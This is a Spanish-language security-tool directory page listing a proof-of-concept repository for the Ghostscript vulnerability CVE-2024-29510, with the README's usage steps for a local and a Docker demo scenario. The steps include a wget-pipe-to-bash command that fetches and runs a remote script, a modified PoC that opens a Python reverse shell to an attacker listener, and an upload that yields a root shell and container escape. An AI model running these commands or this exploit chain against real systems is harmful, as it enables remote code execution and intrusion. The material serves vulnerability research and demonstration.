Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/swsmith2391/cve-2024-29510
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebDesarrollo de PayloadsEscape de ContenedoresExplotación de Binarios
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

Código PoC para CVE-2024-29510 y demo VulnApp

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Investigación original y código POC: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

NOTA: No he realizado cambios en el POC aparte del comando ejecutado. Todo el crédito es para Thomas Rinsma @ Codean Labs por su increíble investigación y POC.

Escenario local

  1. Envuelto en un script stager para descargar y ejecutar un script de verificación para ver si el host es vulnerable
  2. POC modificado para descargar y ejecutar una reverse shell de Python3
  3. Stager y reverse shell descargados y ejecutados a través de STDIN
  4. El POC deja un artefacto en /tmp con nombre aleatorio

En el host atacante:

  1. Usando pwncat-cs o netcat, crea un listener para 443
  2. Navega al directorio del exploit
  3. python3 -m http.server 80

En el host víctima (Ubuntu 23.10 ejecutando Ghostscript 10.01.2):

  1. Abre una terminal y ejecuta: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

Escenario remoto (VulnApp)

  1. Construye VulnApp usando: 'docker build -t cve-2024-29510-demo:latest .' (Requiere una copia de https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz en el directorio del Dockerfile)
  2. Ejecuta VulnApp usando: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. Intenta convertir good.ps para probar la funcionalidad. Debería devolver un PDF renderizado con líneas que dibujan una flecha, p. ej. '>'
  4. Configura un servidor web en el puerto 80 que sirva shell.html, p. ej. 'python3 -m http.server 80'
  5. Usando pwncat-cs o netcat, crea un listener para 443
  6. Sube bad.eps; VulnApp se quedará colgado y el listener debería capturar una reverse shell para el contenedor (ejecutándose como root)
  7. ¡Escapa del contenedor!
Descargar herramienta